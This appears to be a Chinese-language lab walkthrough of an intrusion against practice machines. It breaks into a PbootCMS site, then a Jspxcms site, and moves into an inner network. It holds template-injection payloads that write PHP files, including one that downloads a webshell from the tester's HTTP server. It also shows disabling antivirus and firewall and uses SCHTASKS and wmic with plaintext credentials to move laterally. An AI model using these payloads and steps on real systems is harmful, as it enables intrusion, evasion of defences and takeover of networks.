项目8
信息收集
使用nmap 判断找到ip

得到ip
192.168.79.179
端口信息收集

web 打点
21
尝试爆破ftp

没有结果
22
爆破,没有结果
80
cms

尝试web 路径爆破
并没有什么作用
根据提示绑定域名
C:\WINDOWS\system32\drivers\etc
打开hosts
添加这个


出现了一个神奇玩意儿
尝试爆破一下路径


尝试观看日志

发现版本
下载config

获取了sqlite

会获取db 文件,然后尝试连接

获取密码
8187bef2c0b83e6b0b747d92b0a65eb1
尝试解密


两次解密获取密码
admin7788
尝试登录


登录成功
CVE-2020-23580 PBootCMS安全漏洞浅析 - 先知社区 (aliyun.com)
根据漏洞利用,写info

1
{pbootpbootpboot:if:if:if(fputs(fopen("info.php","w"),"<?php+".chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)."();?>"))}yyy{/pbootpbootpboot:if:if:if}url 编码
1
{pbootpbootpboot:if:if:if(fputs(fopen("info.php","w"),"<?php ".chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111)."();?>"))}yyy{/pbootpbootpboot:if:if:if}然后。。。并没有反应
尝试第二个方法
最新0day! PbootCMS全版本后台通杀任意代码执行漏洞_pbootcms 3.2.5漏洞-CSDN博客
利用失败
尝试第三个方法

添加payload
1
{pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['3','.php']), implode('',['<dut_','contentsd,'"shell.php",','file','_get_','contents("','http://192.168.79.1:8000/getshell.txt"))?>'])))}!!!{/pboot:if}注意将对应的ip 改成自己的http server 的服务

注意提交
然后随便访问3.php

可见成功写入
尝试访问shell.php

没有丝毫问题
尝试蚁剑连接

上线msf
生成一个payload

上传到靶机

开启监听

上线

发现不能执行,使用蚁剑绕过


然后执行就发现上线了

搜索提权漏洞(msf 使用getsystem 会有点问题,就直接搜索漏洞提权)


使用第二个提权成功


查到flag
除此之外还可以使用 docker 进行提权
官方的wp 是通过下载对方的私钥然后及进行ssh
然后使用docker 进行提权
内网信息收集
网段信息收集

使用fscan 进行信息收集

尝试

并没有发现什么
nmap
发现没有nmap 下载一个


发现还存在178 果然还得是namp
178 端口信息收集
内网横向移动
178
8080

又是一个cms
发现登录页面,并且没有验证码,本来想爆破的,但是直接试出来了
admin
123456

找一下漏洞

在最底端发现后台
一次历史漏洞分析与复现的全部过程_jspxcms idea-CSDN博客

制作恶意的zip
1 | |
尝试上传war 包的zip 然后上传之后,cms 自动解压为war 然后经过tomcat 的解压将war 变成jsp

然后上传这个
然后尝试访问

上线msf


发现上线msf 有一点问题,杀软直接让payload 消失了
先收集杀软的信息
1 | |

然后获取

发现两个杀软
查看防火墙信息
1 | |
关闭防火墙
1 | |

制作免杀,针对360

上传成功
刚好制作cs 的raw 进行绕过,发现并不行,只要上传windows defender 就会
那就基于msf 做渗透
或者使用联动
尝试使用联动

发现迟迟不上线
然后发现了原来靶机出了问题
提权,收集信息


获得密码
想到的是通过rdp将360这个恶心的东西关了
开启远程桌面
1 | |

有问题?
尝试直接杀掉

舒服了
二层内网信息收集
ip 信息收集

发现还存在10.10.1.1 网段
尝试上传fscan
这个上传不太行
尝试使用msf 进行存货探测
使用arp 进行内网存活探测,挺慢的

尝试搭建代理
使用stowaway
使用msf



二层内网横向移动
没有思路
尝试IPC

发现可以成功连接
刚好发现copy 指令也是可以使用

上传一个正向的payload 然后连接

1
SCHTASKS /Create /S 10.10.1.130 /u administrator /p QWEasd123 /SC ONCE /ST 22:20 /TN test1 /TR c:\windows\temp\august_bind_20091.exe /RU system1
wmic /node:10.10.1.130 /user:administrator /password:QWEasd123 process list brief